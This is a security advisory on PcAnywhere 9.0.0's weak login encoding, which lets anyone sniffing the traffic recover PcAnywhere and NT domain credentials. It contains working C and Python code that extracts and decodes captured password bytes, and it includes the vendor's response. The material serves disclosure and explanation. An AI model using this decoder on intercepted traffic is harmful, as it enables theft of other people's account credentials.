COMMAND
PcAnywhere
SYSTEMS AFFECTED
PcAnywhere 9.0.0
PROBLEM
Pascal Longpre found the following. PcAnywhere 9.0.0, left at its
default security setting, uses a trivial encryption method so that
user names and passwords are not sent directly in the clear. Since
most users leave the encryption method set to either "none" or
"PcAnywhere", their passwords are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can authenticate
users based on their NT domain accounts and passwords. When the
user logs on, they are prompted for their NT username and password.
These are then "encrypted" with the PcAnywhere method and
decrypted by the host computer for validation by the NT domain
controller. Someone snooping on the traffic between the two
stations can recover both the PcAnywhere and the NT account
credentials, without even having to go through the L0phtCrack
process.
Version 7.0 is not at risk since no encryption is used at all:
username and password are sent in the clear. Version 8 has not been
tested yet.
The username / password are contained in a string two packets away
from the "Enter your login name" and "Enter your password"
prompts. They are preceded by 0x06; the next byte is the string
length. Here is the code of the exploit:
#include <stdio.h>
#include <string.h>

int main(void) {
    unsigned char password[128];   /* sniffed "encrypted" bytes */
    unsigned char cleartext[128];
    size_t len = 5;                /* the length byte that follows 0x06 */
    size_t i;

    /* input the sniffed hex values here */
    /* encrypted example of the 'aaaaa' password */
    password[0] = 0xca;
    password[1] = 0xab;
    password[2] = 0xcb;
    password[3] = 0xa8;
    password[4] = 0xca;

    /* first byte: fixed offset, no key involved */
    cleartext[0] = 0xca - password[0] + 0x61;
    /* remaining bytes: XOR of the previous and current encrypted bytes
       with the zero-based position of the previous byte */
    for (i = 1; i < len; i++)
        cleartext[i] = password[i - 1] ^ password[i] ^ (i - 1);
    cleartext[len] = '\0';

    printf("password is %s\n", cleartext);
    return 0;
}
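To make clear why this scheme offers no protection at all, here is an added example (not the advisory's code, and not Symantec's) that restates the decoder above in Python with an explicit length instead of strlen(), derives the matching encoder as the algebraic inverse of that decoder (an assumption: the host's real encoder is not on the page, only the decoder), and pulls the tag / length / value field the advisory describes out of a constructed payload. The packet bytes and the extract_credential() helper are constructed for illustration; the point to observe is that neither function takes a key, so anyone holding the captured bytes recovers the credential directly.

```python
from typing import Optional


def pca_decode(enc: bytes) -> bytes:
    """Mirror of the advisory's decoder, byte for byte, with an explicit
    length so an encoded 0x00 byte does not truncate the result the way
    strlen() would. Note the absence of any key parameter."""
    if not enc:
        return b""
    out = bytearray(len(enc))
    out[0] = (0xCA - enc[0] + 0x61) & 0xFF          # fixed offset only
    for i in range(1, len(enc)):
        out[i] = enc[i - 1] ^ enc[i] ^ (i - 1)       # neighbour XOR + index
    return bytes(out)


def pca_encode(clear: bytes) -> bytes:
    """Inverse of pca_decode, inferred from it (assumption: the host uses
    exactly this transform). Each output byte depends only on the cleartext,
    the previous output byte and the position; again, no key."""
    if not clear:
        return b""
    out = bytearray(len(clear))
    out[0] = (0xCA + 0x61 - clear[0]) & 0xFF
    for i in range(1, len(clear)):
        out[i] = clear[i] ^ out[i - 1] ^ (i - 1)
    return bytes(out)


def extract_credential(payload: bytes, tag: int = 0x06) -> Optional[bytes]:
    """Locate the field the advisory describes (a 0x06 byte, then a one-byte
    length, then the encoded string) and return its decoded contents.
    Hypothetical helper over a constructed layout, not a protocol parser."""
    idx = payload.find(bytes([tag]))
    if idx < 0 or idx + 1 >= len(payload):
        return None
    length = payload[idx + 1]
    field = payload[idx + 2: idx + 2 + length]
    if len(field) != length:
        return None
    return pca_decode(field)


# Constructed packet fragment: filler, tag 0x06, length 5, the advisory's
# sample encoding of 'aaaaa', trailing filler.
SAMPLE_PAYLOAD = b"\x00\x01\x06\x05\xca\xab\xcb\xa8\xca\x00"


if __name__ == "__main__":
    print(extract_credential(SAMPLE_PAYLOAD))        # b'aaaaa'
    # A cleartext starting with '+' (0x2b) encodes to a leading 0x00 byte,
    # which the strlen()-based decoder in the advisory would drop.
    print(pca_encode(b"+x").hex())
```

The roundtrip pca_decode(pca_encode(x)) == x holds for any byte string, which is the whole weakness: the transform is a fixed, keyless permutation of each byte given its neighbour, so it is an encoding, not encryption, exactly as Symantec's response states.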
SOLUTION
Symantec says that this was not intended to be real encryption and
suggests the use of the Public or Symmetric key option instead. More
info can be found at:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w